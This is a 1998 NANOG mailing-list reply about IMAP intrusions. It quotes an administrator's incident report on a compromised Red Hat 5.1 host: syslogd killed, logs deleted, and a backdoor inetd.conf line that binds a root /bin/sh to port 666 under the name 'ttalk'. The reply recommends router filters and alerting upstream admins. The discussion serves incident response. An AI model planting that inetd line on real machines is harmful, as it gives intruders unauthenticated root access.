Re: IMAP attacks continue

["Alex P. Rudnev" <alex () Relcom EU net>]

Btw. The best you can do is to install access-filter on the router and 
log any attempts to connect into this port in your network; and if you 
see such attempt you should write 'Hacker in your system (suspection)' 
warning to the network admin where this connect was originated from.

70% of this cases should be 'broken systems'.


On Mon, 23 Nov 1998, Phil Howard wrote:

> Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
> From: Phil Howard <phil () whistler intur net>
> To: nanog () merit edu
> Subject: Re: IMAP attacks continue
>
> An addendum to:
>
> > I found a machine that had Red Hat 5.1 unmodified running on it, and it
> > got hit.  So I closed things off and looked around for damage and found
> > the following:
> >
> > 1.  Syslogd had been killed off and the syslog file deleted.
> >
> > 2.  A backdoor was installed in /etc/inetd.conf as follows:
> >
> > ttalk   stream  tcp     nowait  root    /bin/sh         sh -i
>
> I checked the ports assignments from IANA and there is no such thing as
> "ttalk".  I found this line in /etc/services:
>
> ttalk           666/tcp
>
> so it appears to be hijacking the port used by (as seen in the file
> ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
>
> mdqs            666/tcp
> mdqs            666/udp
> doom            666/tcp    doom Id Software
> doom            666/udp    doom Id Software
>
> So also check /etc/services on any potentially compromised machines.
>
> -- 
>  --    *-----------------------------*      Phil Howard KA9WGN       *    --
>   --   | Inturnet, Inc.              | Director of Internet Services |   --
>    --  | Business Internet Solutions |       eng at intur.net        |  --
>     -- *-----------------------------*      philh at intur.net       * --

Aleksei Roudnev, Network Operations Center, Relcom, Moscow
(+7 095) 194-19-95 (Network Operations Center Hot Line),(+7 095) 239-10-10, N 13729 (pager)
(+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)